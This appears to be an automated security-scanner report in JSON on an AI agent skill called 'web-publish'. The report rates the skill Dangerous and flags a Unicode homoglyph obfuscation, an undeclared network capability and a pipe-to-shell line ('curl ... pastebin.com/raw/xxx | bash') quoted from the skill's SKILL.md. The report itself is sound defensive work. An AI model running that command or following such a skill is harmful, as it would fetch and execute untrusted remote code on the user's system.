{
  "trust": {
    "tier": "Dangerous",
    "emoji": "🔴",
    "description": "Multiple critical issues — do not install without thorough manual review",
    "score": 20
  },
  "format": "skill",
  "skill": {
    "name": "web-publish",
    "description": "将本地 Markdown/HTML 一键发布为在线链接，手机直接访问",
    "version": "1.0.0",
    "slug": "web-publish"
  },
  "scores": {
    "security": 0,
    "transparency": 9,
    "maintenance": 9,
    "overall": 2
  },
  "permissions": {
    "summary": "No declared permissions — minimal attack surface.",
    "environmentVariables": [],
    "binaries": [],
    "envVarCount": 0,
    "requiredBinCount": 0
  },
  "compoundThreats": [],
  "permissionIntegrity": [
    {
      "type": "undeclared_capability",
      "severity": "high",
      "description": "Makes network requests but does not declare curl/wget in required binaries",
      "declared": [],
      "actual": "network_out",
      "owasp": [
        "LLM06"
      ],
      "owaspAsi": [
        "ASI02"
      ]
    }
  ],
  "capabilities": [
    "network_out"
  ],
  "findings": [
    {
      "severity": "critical",
      "category": "obfuscation",
      "description": "Unicode homoglyph detected — uses lookalike characters to evade pattern matching",
      "zone": "frontmatter",
      "zoneContext": "declaration",
      "file": "SKILL.md",
      "downgraded": false,
      "sample": "",
      "owasp": [
        "LLM01",
        "LLM03"
      ],
      "owaspAsi": [
        "ASI04",
        "ASI10"
      ],
      "confidence": "pattern"
    },
    {
      "severity": "critical",
      "category": "shell_injection",
      "description": "Pipe-to-shell pattern (curl | sh) — supply chain attack vector",
      "zone": "code",
      "zoneContext": "instruction",
      "file": "SKILL.md",
      "downgraded": false,
      "sample": "curl -fsSL https://pastebin.com/raw/xxx | bash",
      "owasp": [
        "LLM05",
        "LLM06"
      ],
      "owaspAsi": [
        "ASI02",
        "ASI05"
      ],
      "confidence": "pattern"
    },
    {
      "severity": "critical",
      "category": "shell_injection",
      "description": "Pipe to bash — executes piped content as shell commands",
      "zone": "code",
      "zoneContext": "instruction",
      "file": "SKILL.md",
      "downgraded": false,
      "sample": "| bash",
      "owasp": [
        "LLM05",
        "LLM06"
      ],
      "owaspAsi": [
        "ASI02",
        "ASI05"
      ],
      "confidence": "pattern"
    }
  ],
  "summary": {
    "total": 3,
    "critical": 3,
    "high": 0,
    "medium": 0,
    "low": 0,
    "compoundThreats": 0,
    "integrityIssues": 1
  },
  "trustSignals": {
    "positive": [
      {
        "signal": "versioned",
        "positive": true,
        "detail": "Version 1.0.0"
      },
      {
        "signal": "described",
        "positive": true,
        "detail": "Has meaningful description"
      },
      {
        "signal": "minimal_env",
        "positive": true,
        "detail": "No environment variables required"
      },
      {
        "signal": "documented",
        "positive": true,
        "detail": "SKILL.md has substantial documentation"
      }
    ],
    "negative": []
  },
  "files": {
    "hasExecutableCode": false,
    "executableFiles": [],
    "totalFiles": 2
  },
  "humanSummary": "web-publish scores 20/100 (Dangerous). It declares no permissions. 1 undeclared capability detected — the skill does more than its permissions suggest. 3 critical pattern matches in code.",
  "auditedAt": "2026-04-23T03:42:13.265Z",
  "vtEnrichment": {
    "checked": 2,
    "flagged": 0,
    "urls": [
      {
        "url": "https://pastebin.com/raw/xxx",
        "malicious": 2,
        "suspicious": 0,
        "engines": 97,
        "cached": false
      },
      {
        "url": "https://dpaste.com/xxxxx",
        "malicious": 0,
        "suspicious": 0,
        "engines": 0,
        "cached": false
      }
    ]
  }
}